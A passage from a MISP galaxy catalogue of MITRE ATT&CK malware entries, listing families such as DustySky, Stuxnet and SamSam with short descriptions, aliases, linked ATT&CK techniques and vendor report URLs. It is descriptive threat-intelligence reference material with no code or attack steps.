[DustySky](https://attack.mitre.org/software/S0062) is multi-stage malware written in .NET that has been used by [Molerats](https://attack.mitre.org/groups/G0021) since May 2015. (Citation: DustySky) (Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)

The tag is: misp-galaxy:mitre-malware="DustySky - S0062"

DustySky - S0062 is also known as:

  • DustySky

  • NeD Worm

DustySky - S0062 has relationships with:

  • similar: misp-galaxy:tool="NeD Worm" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7305. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf

https://attack.mitre.org/software/S0062

https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/

https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf

InvisiMole - S0260

[InvisiMole](https://attack.mitre.org/software/S0260) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://attack.mitre.org/software/S0260) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://attack.mitre.org/groups/G0047) infrastructure has been used to download and execute [InvisiMole](https://attack.mitre.org/software/S0260) against a small number of victims.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)

The tag is: misp-galaxy:mitre-malware="InvisiMole - S0260"

InvisiMole - S0260 is also known as:

  • InvisiMole

Table 7306. Table References

Links

https://attack.mitre.org/software/S0260

https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Wiarp - S0206

[Wiarp](https://attack.mitre.org/software/S0206) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Wiarp May 2012)

The tag is: misp-galaxy:mitre-malware="Wiarp - S0206"

Wiarp - S0206 is also known as:

  • Wiarp

Wiarp - S0206 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7307. Table References

Links

https://attack.mitre.org/software/S0206

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99

OwaAuth - S0072

[OwaAuth](https://attack.mitre.org/software/S0072) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://attack.mitre.org/groups/G0027). (Citation: Dell TG-3390)

The tag is: misp-galaxy:mitre-malware="OwaAuth - S0072"

OwaAuth - S0072 is also known as:

  • OwaAuth

OwaAuth - S0072 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7308. Table References

Links

https://attack.mitre.org/software/S0072

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

RogueRobin - S0270

[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)

The tag is: misp-galaxy:mitre-malware="RogueRobin - S0270"

RogueRobin - S0270 is also known as:

  • RogueRobin

Table 7309. Table References

Links

https://attack.mitre.org/software/S0270

https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/

Vasport - S0207

[Vasport](https://attack.mitre.org/software/S0207) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Vasport May 2012)

The tag is: misp-galaxy:mitre-malware="Vasport - S0207"

Vasport - S0207 is also known as:

  • Vasport

Vasport - S0207 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7310. Table References

Links

https://attack.mitre.org/software/S0207

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-5938-99

Zeroaccess - S0027

[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)

The tag is: misp-galaxy:mitre-malware="Zeroaccess - S0027"

Zeroaccess - S0027 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 7311. Table References

Links

https://attack.mitre.org/software/S0027

https://sophosnews.files.wordpress.com/2012/04/zeroaccess2.pdf

SHIPSHAPE - S0028

[SHIPSHAPE](https://attack.mitre.org/software/S0028) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="SHIPSHAPE - S0028"

SHIPSHAPE - S0028 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"

Table 7312. Table References

Links

https://attack.mitre.org/software/S0028

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Emissary - S0082

[Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)

The tag is: misp-galaxy:mitre-malware="Emissary - S0082"

Emissary - S0082 is also known as:

  • Emissary

Emissary - S0082 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7313. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/

https://attack.mitre.org/software/S0082

MirageFox - S0280

[MirageFox](https://attack.mitre.org/software/S0280) is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. (Citation: APT15 Intezer June 2018)

The tag is: misp-galaxy:mitre-malware="MirageFox - S0280"

MirageFox - S0280 is also known as:

  • MirageFox

Table 7314. Table References

Links

https://attack.mitre.org/software/S0280

https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

Pasam - S0208

[Pasam](https://attack.mitre.org/software/S0208) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Pasam May 2012)

The tag is: misp-galaxy:mitre-malware="Pasam - S0208"

Pasam - S0208 is also known as:

  • Pasam

Pasam - S0208 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7315. Table References

Links

https://attack.mitre.org/software/S0208

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2012-050412-4128-99

Darkmoon - S0209

The tag is: misp-galaxy:mitre-malware="Darkmoon - S0209"

Darkmoon - S0209 has relationships with:

  • similar: misp-galaxy:malpedia="Darkmoon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 7316. Table References

Links

https://attack.mitre.org/software/S0209

Gooligan - S0290

[Gooligan](https://attack.mitre.org/software/S0290) is a malware family that runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal authentication tokens that can be used to access data from many Google applications. [Gooligan](https://attack.mitre.org/software/S0290) has been described as part of the Ghost Push Android malware family. (Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)

The tag is: misp-galaxy:mitre-malware="Gooligan - S0290"

Gooligan - S0290 is also known as:

  • Gooligan

  • Ghost Push

Gooligan - S0290 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"

Table 7317. Table References

Links

http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/

https://attack.mitre.org/software/S0290

https://blog.lookout.com/blog/2016/12/01/ghost-push-gooligan/

https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi

MazarBOT - S0303

[MazarBOT](https://attack.mitre.org/software/S0303) is Android malware that was distributed via SMS in Denmark in 2016. (Citation: Tripwire-MazarBOT)

The tag is: misp-galaxy:mitre-malware="MazarBOT - S0303"

MazarBOT - S0303 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 7318. Table References

Links

https://attack.mitre.org/software/S0303

https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/

NetTraveler - S0033

[NetTraveler](https://attack.mitre.org/software/S0033) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. (Citation: Kaspersky NetTraveler)

The tag is: misp-galaxy:mitre-malware="NetTraveler - S0033"

NetTraveler - S0033 is also known as:

  • NetTraveler

NetTraveler - S0033 has relationships with:

  • similar: misp-galaxy:malpedia="NetTraveler" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="NetTraveler" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

Table 7319. Table References

Links

http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf

https://attack.mitre.org/software/S0033

BUBBLEWRAP - S0043

[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)

The tag is: misp-galaxy:mitre-malware="BUBBLEWRAP - S0043"

BUBBLEWRAP - S0043 is also known as:

  • BUBBLEWRAP

  • Backdoor.APT.FakeWinHTTPHelper

BUBBLEWRAP - S0043 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7320. Table References

Links

https://attack.mitre.org/software/S0043

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

NETEAGLE - S0034

[NETEAGLE](https://attack.mitre.org/software/S0034) is a backdoor developed by [APT30](https://attack.mitre.org/groups/G0013) with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="NETEAGLE - S0034"

NETEAGLE - S0034 is also known as:

  • NETEAGLE

NETEAGLE - S0034 has relationships with:

  • similar: misp-galaxy:malpedia="NETEAGLE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 7321. Table References

Links

https://attack.mitre.org/software/S0034

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Octopus - S0340

[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://attack.mitre.org/groups/G0133) to target government organizations in Central Asia since at least 2014.(Citation: Securelist Octopus Oct 2018)(Citation: Security Affairs DustSquad Oct 2018)(Citation: ESET Nomadic Octopus 2018)

The tag is: misp-galaxy:mitre-malware="Octopus - S0340"

Octopus - S0340 is also known as:

  • Octopus

Table 7322. Table References

Links

https://attack.mitre.org/software/S0340

https://securelist.com/octopus-infested-seas-of-central-asia/88200/

https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html

https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf

Riltok - S0403

[Riltok](https://attack.mitre.org/software/S0403) is banking malware that uses phishing popups to collect user credentials.(Citation: Kaspersky Riltok June 2019)

The tag is: misp-galaxy:mitre-malware="Riltok - S0403"

Riltok - S0403 is also known as:

  • Riltok

Table 7323. Table References

Links

https://attack.mitre.org/software/S0403

https://securelist.com/mobile-banker-riltok/91374/

SPACESHIP - S0035

[SPACESHIP](https://attack.mitre.org/software/S0035) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="SPACESHIP - S0035"

SPACESHIP - S0035 is also known as:

  • SPACESHIP

SPACESHIP - S0035 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023" with estimative-language:likelihood-probability="almost-certain"

Table 7324. Table References

Links

https://attack.mitre.org/software/S0035

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

SeaDuke - S0053

[SeaDuke](https://attack.mitre.org/software/S0053) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://attack.mitre.org/software/S0046). (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="SeaDuke - S0053"

SeaDuke - S0053 is also known as:

  • SeaDuke

  • SeaDaddy

  • SeaDesk

SeaDuke - S0053 has relationships with:

  • similar: misp-galaxy:malpedia="SEADADDY" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7325. Table References

Links

https://attack.mitre.org/software/S0053

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

FrameworkPOS - S0503

[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from sytems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)

The tag is: misp-galaxy:mitre-malware="FrameworkPOS - S0503"

FrameworkPOS - S0503 is also known as:

  • FrameworkPOS

  • Trinity

Table 7326. Table References

Links

https://attack.mitre.org/software/S0503

https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/

Melcoz - S0530

[Melcoz](https://attack.mitre.org/software/S0530) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://attack.mitre.org/software/S0530) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: misp-galaxy:mitre-malware="Melcoz - S0530"

Melcoz - S0530 is also known as:

  • Melcoz

Table 7327. Table References

Links

https://attack.mitre.org/software/S0530

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

zwShell - S0350

[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during [Night Dragon](https://attack.mitre.org/campaigns/C0002).(Citation: McAfee Night Dragon)

The tag is: misp-galaxy:mitre-malware="zwShell - S0350"

zwShell - S0350 is also known as:

  • zwShell

Table 7328. Table References

Links

https://attack.mitre.org/software/S0350

https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf

BONDUPDATER - S0360

[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)

The tag is: misp-galaxy:mitre-malware="BONDUPDATER - S0360"

BONDUPDATER - S0360 is also known as:

  • BONDUPDATER

Table 7329. Table References

Links

https://attack.mitre.org/software/S0360

https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

FLASHFLOOD - S0036

[FLASHFLOOD](https://attack.mitre.org/software/S0036) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="FLASHFLOOD - S0036"

FLASHFLOOD - S0036 is also known as:

  • FLASHFLOOD

FLASHFLOOD - S0036 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 7330. Table References

Links

https://attack.mitre.org/software/S0036

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

SHOTPUT - S0063

[SHOTPUT](https://attack.mitre.org/software/S0063) is a custom backdoor used by [APT3](https://attack.mitre.org/groups/G0022). (Citation: FireEye Clandestine Wolf)

The tag is: misp-galaxy:mitre-malware="SHOTPUT - S0063"

SHOTPUT - S0063 is also known as:

  • SHOTPUT

  • Backdoor.APT.CookieCutter

  • Pirpi

SHOTPUT - S0063 has relationships with:

  • similar: misp-galaxy:tool="Pirpi" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7331. Table References

Links

https://attack.mitre.org/software/S0063

https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html

https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html

Nebulae - S0630

[Nebulae](https://attack.mitre.org/software/S0630) Is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)

The tag is: misp-galaxy:mitre-malware="Nebulae - S0630"

Nebulae - S0630 is also known as:

  • Nebulae

Table 7332. Table References

Links

https://attack.mitre.org/software/S0630

https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf

Stuxnet - S0603

[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)

The tag is: misp-galaxy:mitre-malware="Stuxnet - S0603"

Stuxnet - S0603 is also known as:

  • Stuxnet

  • W32.Stuxnet

Table 7333. Table References

Links

https://attack.mitre.org/software/S0603

https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01

https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf

https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf

HAMMERTOSS - S0037

[HAMMERTOSS](https://attack.mitre.org/software/S0037) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: FireEye APT29) (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="HAMMERTOSS - S0037"

HAMMERTOSS - S0037 is also known as:

  • HAMMERTOSS

  • HammerDuke

  • NetDuke

HAMMERTOSS - S0037 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"

Table 7334. Table References

Links

https://attack.mitre.org/software/S0037

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

ASPXSpy - S0073

[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. It has been modified by [Threat Group-3390](https://attack.mitre.org/groups/G0027) actors to create the ASPXTool version. (Citation: Dell TG-3390)

The tag is: misp-galaxy:mitre-malware="ASPXSpy - S0073"

ASPXSpy - S0073 is also known as:

  • ASPXSpy

  • ASPXTool

ASPXSpy - S0073 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"

Table 7335. Table References

Links

https://attack.mitre.org/software/S0073

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

SamSam - S0370

[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)

The tag is: misp-galaxy:mitre-malware="SamSam - S0370"

SamSam - S0370 is also known as:

  • SamSam

  • Samas

Table 7336. Table References

Links

https://attack.mitre.org/software/S0370

https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html

https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-targets-carefully-wpna.pdf

https://www.symantec.com/blogs/threat-intelligence/samsam-targeted-ransomware-attacks

https://www.us-cert.gov/ncas/alerts/AA18-337A

StoneDrill - S0380

[StoneDrill](https://attack.mitre.org/software/S0380) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33](https://attack.mitre.org/groups/G0064).(Citation: FireEye APT33 Sept 2017)(Citation: Kaspersky StoneDrill 2017)

The tag is: misp-galaxy:mitre-malware="StoneDrill - S0380"

StoneDrill - S0380 is also known as:

  • StoneDrill

  • DROPSHOT

Table 7337. Table References

Links

https://attack.mitre.org/software/S0380

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

Duqu - S0038

[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)

The tag is: misp-galaxy:mitre-malware="Duqu - S0038"

Duqu - S0038 is also known as:

  • Duqu

Duqu - S0038 has relationships with:

  • similar: misp-galaxy:tool="Duqu" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1093" with estimative-language:likelihood-probability="almost-certain"

Table 7338. Table References

Links

https://attack.mitre.org/software/S0038

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Misdat - S0083

[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="Misdat - S0083"

Misdat - S0083 is also known as:

  • Misdat

Misdat - S0083 has relationships with:

  • similar: misp-galaxy:malpedia="Misdat" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 7339. Table References

Links

https://attack.mitre.org/software/S0083

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

Adups - S0309

[Adups](https://attack.mitre.org/software/S0309) is software that was pre-installed onto Android devices, including those made by BLU Products. The software was reportedly designed to help a Chinese phone manufacturer monitor user behavior, transferring sensitive data to a Chinese server. (Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)

The tag is: misp-galaxy:mitre-malware="Adups - S0309"

Adups - S0309 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

Table 7340. Table References

Links

http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534

https://attack.mitre.org/software/S0309

https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html

SQLRat - S0390

[SQLRat](https://attack.mitre.org/software/S0390) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://attack.mitre.org/groups/G0046) has been observed using it.(Citation: Flashpoint FIN 7 March 2019)

The tag is: misp-galaxy:mitre-malware="SQLRat - S0390"

SQLRat - S0390 is also known as:

  • SQLRat

Table 7341. Table References

Links

https://attack.mitre.org/software/S0390

https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/

JHUHUGIT - S0044

[JHUHUGIT](https://attack.mitre.org/software/S0044) is malware used by [APT28](https://attack.mitre.org/groups/G0007). It is based on Carberp source code and serves as reconnaissance malware. (Citation: Kaspersky Sofacy) (Citation: F-Secure Sofacy 2015) (Citation: ESET Sednit Part 1) (Citation: FireEye APT28 January 2017)

The tag is: misp-galaxy:mitre-malware="JHUHUGIT - S0044"

JHUHUGIT - S0044 is also known as:

  • JHUHUGIT

  • Trojan.Sofacy

  • Seduploader

  • JKEYSKW

  • Sednit

  • GAMEFISH

  • SofacyCarberp

JHUHUGIT - S0044 has relationships with:

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Seduploader" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 7342. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf

https://attack.mitre.org/software/S0044

https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html

https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/

https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

SHARPSTATS - S0450

[SHARPSTATS](https://attack.mitre.org/software/S0450) is a .NET backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2019.(Citation: TrendMicro POWERSTATS V3 June 2019)

The tag is: misp-galaxy:mitre-malware="SHARPSTATS - S0450"

SHARPSTATS - S0450 is also known as:

  • SHARPSTATS

Table 7343. Table References

Links

https://attack.mitre.org/software/S0450

https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/

ADVSTORESHELL - S0045

[ADVSTORESHELL](https://attack.mitre.org/software/S0045) is a spying backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 2)

The tag is: misp-galaxy:mitre-malware="ADVSTORESHELL - S0045"

ADVSTORESHELL - S0045 is also known as:

  • ADVSTORESHELL

  • AZZY

  • EVILTOSS

  • NETUI

  • Sedreco

ADVSTORESHELL - S0045 has relationships with:

  • similar: misp-galaxy:malpedia="Sedreco" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="EVILTOSS" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1022" with estimative-language:likelihood-probability="almost-certain"

Table 7344. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

https://attack.mitre.org/software/S0045

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

Asacub - S0540

[Asacub](https://attack.mitre.org/software/S0540) is a banking trojan that attempts to steal money from victims’ bank accounts. It attempts to do this by initiating a wire transfer via SMS message from compromised devices.(Citation: Securelist Asacub)

The tag is: misp-galaxy:mitre-malware="Asacub - S0540"

Asacub - S0540 is also known as:

  • Asacub

  • Trojan-SMS.AndroidOS.Smaps

Table 7345. Table References

Links

https://attack.mitre.org/software/S0540

https://securelist.com/the-rise-of-mobile-banker-asacub/87591/

Anchor - S0504

